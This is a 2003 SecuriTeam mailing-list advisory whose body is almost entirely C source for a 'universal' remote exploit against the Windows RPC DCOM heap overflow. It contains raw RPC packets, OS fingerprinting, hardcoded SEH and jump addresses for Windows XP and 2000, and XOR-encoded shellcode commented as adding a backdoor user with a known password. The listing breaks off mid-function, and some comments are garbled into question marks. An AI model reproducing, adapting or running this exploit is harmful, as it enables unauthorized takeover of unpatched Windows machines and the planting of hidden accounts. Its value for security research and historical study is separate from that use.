[EXPL] Windows RPC Universal Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 10/09/03

    To: list@securiteam.com
    Date: 9 Oct 2003 15:05:52 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Windows RPC Universal Exploit
    ------------------------------------------------------------------------

    SUMMARY

    The following exploit code is a universal exploit for the Windows RPC
    security vulnerability we reported earlier. This more advanced exploit
    code doesn't use static addresses for jumps.

    DETAILS

    Exploit:
    /* http://www.security.nnov.ru/files/rpcdcom3.c
    1) ???????????? ???: *.exe 127.0.0.1 ->????????
    2) *.exe 192 168 1 1 100 - ?????????? ??????? ??????? ? ?????????, ?????
    ???-?? ??????...
    3) ?????!!! ??? ??????? ???????? ?? bshell2, ? ???? ????? ???????? ???
    ????-???, ??? ??
    ????? ?????????? ???????? ??? ?????? heap ? ???????? ??? ????-????.
    Modification (c) [karlss0n]
    */

    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>

    FILE *fp1;
    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
    0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
    void XOR(unsigned char *buf,int offset,int length,unsigned char mask)
    {
      for(int i=offset;i<(offset+length);i++)
       buf[i]=buf[i]^mask;
    }
    DWORD GETSTRCS(char *buf)
    {
      DWORD cs=0;
      bool cld=false;
      for(unsigned int i=0;i<strlen(buf);i++)
      {
       for(int z=0;z<13;z++)
       {
       if(cs&1) cld=true;
       cs=cs>>1;
       if(cld) cs=cs|0x80000000;
       cld=false;
       }
       cs+=buf[i];
      }
      return cs;
    }

    struct {
      DWORD seh;
      DWORD jmp;
      DWORD heap;
      char target[200];
    } target_os[]=
    {
      {
       0x005Bfd2c,
       0x00081eeb,
       0x00180000,
       "WinXP"
      },
      {
       0x0095fd3c,
       0x00081eeb,
       0x00170000,
       "Win2K"
      }
    },v;
    unsigned char rawData1[]=
     "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
     "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"

     "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
     "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
     "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
     "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"

    //SHELLCODE From SAM ,THANKs !
    //Add user SST,password is 557,
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"

    "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
    "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
    "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
    "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
    "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
    "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
    "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
    "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
    "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
    "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
    "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
    "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
    "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
    "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
    "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
    "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
    "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
    "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
    "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
    "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"

     "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
     "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
     "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
     "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
     "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
     "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
     "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
     "\x90\x90\x90\x90\x90\x90\x90\x90"
     "\x77\xe0\x43\x00\x00\x10\x5c\x00"
     "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
     "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os

    //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more from my
    //article "Utilization of released heap structure and exploit of universal
    //Heap overflow in windows ".
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
    "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
    "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
    "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
    "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
    "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
    "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
    "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
    "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
    "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
    "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
    "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
    "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
    "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
    "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
    "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
    "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
    "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
    "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
    "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
    "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
    "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
    "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
    "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
    "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"

    "\x04\x04\x00\x70\x00\x04\x40"
    "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"

    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";

    int version(char ip[16], int sock)
    {
    //a bit of ettercap...

    unsigned char peer0_0[] = {
    0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
    0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
    0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
    0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
    0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
    0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
    0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
    0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
    0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
    0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
    0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
    0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00 };

    unsigned char peer0_1[] = {
    0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
    0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
    0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
    0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
    0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
    0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
    0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
    0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
    0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
    0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
    0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
    0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
    0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
    0x07, 0x00 };

    /*

    unsigned char win2kvuln[] = {
    0x04, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00};
    */
      fd_set fds2;
      unsigned char buf[1024];

      int l;
      struct timeval tv2;
      FD_ZERO(&fds2);
      FD_SET(sock, &fds2);
      tv2.tv_sec = 6;
      tv2.tv_usec = 0;

      memset(buf,'\0',sizeof(buf));
      send(sock,(char *)peer0_0,sizeof(peer0_0),0);
      if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
      {
       l=recv (sock, (char *)buf, sizeof (buf),0);
    // for(i=0;i<52;i++)
    // {
    // if (i==28) i=i+4;
    // if (buf[i+32]!=win2kvuln)
    // {
         send(sock,(const char *)peer0_1,sizeof(peer0_1),0);
         if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
         {
           memset(buf,'\0',sizeof(buf));
           l=recv (sock, (char *)buf, sizeof (buf),0);
           if (l==32)
           {
            closesocket(sock);
            return(1);//winxp
           }
           else
           {
           #ifdef WIN32
           closesocket(sock);
           #else
           close(sock);
           #endif
           return(0);//win2kby default. Nt4 not added..
           }
         }
         else return(-1);
    // }

       //}
    // closesocket(sock);
    // return(0);//win2k
      }
      closesocket(sock);
      return(-1); //Unknown
    }
    /********************************************************************************/
    int attack(char *ip1,bool atack)
    {
      unsigned char rawData[1036];
      memcpy(rawData,rawData1,1036);
      unsigned char shellcode[50000];
      char ip[200];
      strcpy(ip,ip1);
     WSADATA WSAData;
     SOCKET sock;
     int len,len1;
     SOCKADDR_IN addr_in;
     short port=135;
     unsigned char buf1[50000];
     unsigned char buf2[50000];

      printf("%s\n",ip);
     //printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
     //printf("Code by FlashSky,Flashsky xfocus org\n");
     //printf("Welcome to our Site: http://www.xfocus.org\n");
     //printf("Welcome to our Site: http://www.venustech.com.cn\n");
    /* if(argc!=3)
     {
       printf("%s targetIP targetOS\ntargets:\n",argv[0]);
       for(int i=0;i<sizeof(target_os)/sizeof(v);i++)
        printf("%d - %s\n",i,target_os.target);
        printf("\n%x\n",GETSTRCS(argv[1]));
       return;
     }
    */
    /* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
     {
      printf("WSAStartup error.Error:%d\n",WSAGetLastError());
      return;
     }
    */
     addr_in.sin_family=AF_INET;
     addr_in.sin_port=htons(port);
     addr_in.sin_addr.S_un.S_addr=inet_addr(ip);
      
     if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
     {
      printf("Socket failed.Error:%d\n",WSAGetLastError());
      return 0;
     }
     len1=sizeof(request1);

     len=sizeof(rawData);

     if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in), NULL,
    NULL, NULL, NULL)==SOCKET_ERROR)
     {
      printf("%s - connect failed\n",ip);
      return 0;
     }

      int vers=!version(ip,sock);

    // printf("%d\n",vers);
    // return;
    // int vers=1;

      FILE *fp;

      //?????? ?????
    // fp=fopen("shellcode","rb");
    // fread(rawData,1,1036,fp);
    // fclose(fp);
      //?????? ????? ???????? ??????????????? ??????????? ???????!

      fp=fopen("bshell2","rb");
      int sz=fread(shellcode,1,1024,fp);
      fclose(fp);
    // printf("%d\n",sz);
      for(int i=0;i<sz;i++)
       rawData[i+0x71]=shellcode[i];
    // fp=fopen("badfile.exe","rb");
    // unsigned int sz1=fread(shellcode,1,50000,fp);
    // fclose(fp);
    // for(i=0;i<sz1;i++)
    // rawData[i+0x240]=shellcode;

    // fp=fopen("pac","wb");
    // fwrite(rawData,1,1036,fp);
    // fclose(fp);

    // return;

      
      //????? ??? ??? ??????? ??????? ????? ?????????? HEAP'a
    // DWORD heap=0x00180000;
    // int k=vers;
    // vers=1;
    // *(DWORD *)(rawData+0xae)=target_os[vers].heap;
      *(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap;
      //?????? ????? ?????????? ??? ???, ??? ???? ????? ???????? ?????? ???
    // ?????, ??? ????? ?????? ? ???????? ????????, ??????? ?????????? ????, ?
    // ????????
    // ??????
      XOR(rawData,0x71,sz,0x99);
    // XOR(rawData,0x240,sz1,0x99);
      //??? ?? ??? ????? ???????? ?????? ??? SEH ? JMP
      DWORD seh=target_os[vers].seh;
      DWORD jmp=target_os[vers].jmp;
      *(DWORD *)(rawData+0x22a)=jmp;
      *(DWORD *)(rawData+0x22e)=seh;
    // *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz));
      *(WORD *)(rawData+0x62)=sz;

      memcpy(buf2,request1,sizeof(request1));
     *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2;
     *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2;
     memcpy(buf2+len1,request2,sizeof(request2));
     len1=len1+sizeof(request2);

     memcpy(buf2+len1,rawData,sizeof(rawData));
     len1=len1+sizeof(rawData);

     memcpy(buf2+len1,request3,sizeof(request3));
     len1=len1+sizeof(request3);
     memcpy(buf2+len1,request4,sizeof(request4));
     len1=len1+sizeof(request4);
     *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

     *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
     *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
     *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
     *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
     *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
     *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
     *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
      
      closesocket(sock);
      if(atack)
      {
       sock=socket(2,1,0);
